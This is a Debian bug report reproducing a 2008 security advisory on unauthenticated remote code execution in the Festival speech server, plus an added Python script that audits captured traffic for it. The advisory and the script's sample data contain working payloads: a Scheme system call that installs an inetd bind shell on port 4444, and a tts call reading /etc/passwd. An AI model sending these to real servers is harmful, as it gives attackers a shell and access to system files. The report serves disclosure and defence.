Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole

Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown <mailto:[EMAIL PROTECTED]>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Festival 1.96:beta July 2004 
<http://www.cstr.ed.ac.uk/projects/festival.html>
Vendor: Centre for Speech Technology Research, University of Edinburgh 
<http://www.cstr.ed.ac.uk/>
Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.

Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux 
distributions.  The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.

Technical Details

The Festival server, which can be started using festival --server, is vulnerable
to unauthenticated remote command execution due to the inclusion of a Scheme
interpreter.  It is possible to make use of standard Scheme functions in order
to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited,
the inclusion of a Scheme interpreter available without authentication allows
for other vectors of attack.  Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) are of particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the Scheme interpreter in this
manner is entirely intentional, the default insecure state of the server could
be exploited, particularly where the user is unaware of the server's existence.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host-based firewall.  The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.
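
The following is an added defensive example, not part of the advisory or of
Festival itself: it audits a constructed capture of client messages sent to the
Festival port (1314) for the two problems described above, a client that is not
on localhost (the Solutions section) and a Scheme expression that calls
system or tts (the Technical Details section). The port number and the two
payloads come from the advisory; the set of flagged functions, the sample
capture and the source addresses are assumptions made for the example.

```python
"""Audit a constructed capture of client->server messages for a Festival
server (TCP 1314) against the unauthenticated Scheme evaluation issue."""
import ipaddress
import re

FESTIVAL_PORT = 1314
# Scheme functions the advisory shows giving a remote client a shell or file
# access. This set is an assumption for the example; extend it as needed.
DANGEROUS_CALLS = {"system", "tts"}

_STRING = re.compile(r'"(?:\\.|[^"\\])*"')      # a Scheme string literal
_CALL = re.compile(r'\(\s*([^\s()"\']+)')       # '(' followed by a symbol


def scheme_calls(expr):
    """Return the set of function names called anywhere in a Scheme expression.
    String literals are blanked first so that parentheses and quotes inside
    them (e.g. the shell command in the advisory's payload) are not mistaken
    for nested calls."""
    return set(_CALL.findall(_STRING.sub('""', expr)))


def audit_message(src_ip, dst_port, payload):
    """Return a list of findings (strings) for one client->server message."""
    findings = []
    if dst_port != FESTIVAL_PORT:
        return findings
    if not ipaddress.ip_address(src_ip).is_loopback:
        findings.append(f"festival port reached from non-loopback host {src_ip}")
    for name in sorted(scheme_calls(payload) & DANGEROUS_CALLS):
        findings.append(f"dangerous Scheme call from {src_ip}: ({name} ...)")
    return findings


def audit_capture(capture):
    """Flatten the findings for a whole capture of (src_ip, dst_port, payload)."""
    return [f for msg in capture for f in audit_message(*msg)]


# Constructed capture: the advisory's two payloads, a normal local request,
# and an unrelated message on another port. Source addresses are made up.
SAMPLE_CAPTURE = [
    ("10.0.0.2", 1314, "(system \"echo '4444 stream tcp nowait festival /bin/bash "
                       "/bin/bash -i' > /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf\")"),
    ("10.0.0.2", 1314, '(tts "/etc/passwd" nil)'),
    ("127.0.0.1", 1314, '(SayText "hello world")'),
    ("10.0.0.2", 22, '(system "id")'),
]

if __name__ == "__main__":
    for finding in audit_capture(SAMPLE_CAPTURE):
        print(finding)
```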

-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 
'stable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages festival depends on:
ii  adduser                 3.105            add and remove users and groups
ii  libaudiofile0           0.2.6-7          Open-source version of SGI's audio
ii  libc6                   2.7-8            GNU C Library: Shared libraries
ii  libesd0                 0.2.36-3         Enlightened Sound Daemon - Shared 
ii  libestools1.2           1:1.2.96~beta-2  Edinburgh Speech Tools Library
ii  libgcc1                 1:4.3-20080202-1 GCC support library
ii  libncurses5             5.6+20080203-1   Shared libraries for terminal hand
ii  libstdc++6              4.3-20080202-1   The GNU Standard C++ Library v3
ii  lsb-base                3.1-24           Linux Standard Base 3.1 init scrip
ii  sgml-base               1.26             SGML infrastructure and SGML catal
ii  sysv-rc                 2.86.ds1-53      System-V-like runlevel change mech

Versions of packages festival recommends:
ii  festvox-kallpc16k [festival-v 1.4.0-5    American English male speaker for 

-- no debconf information
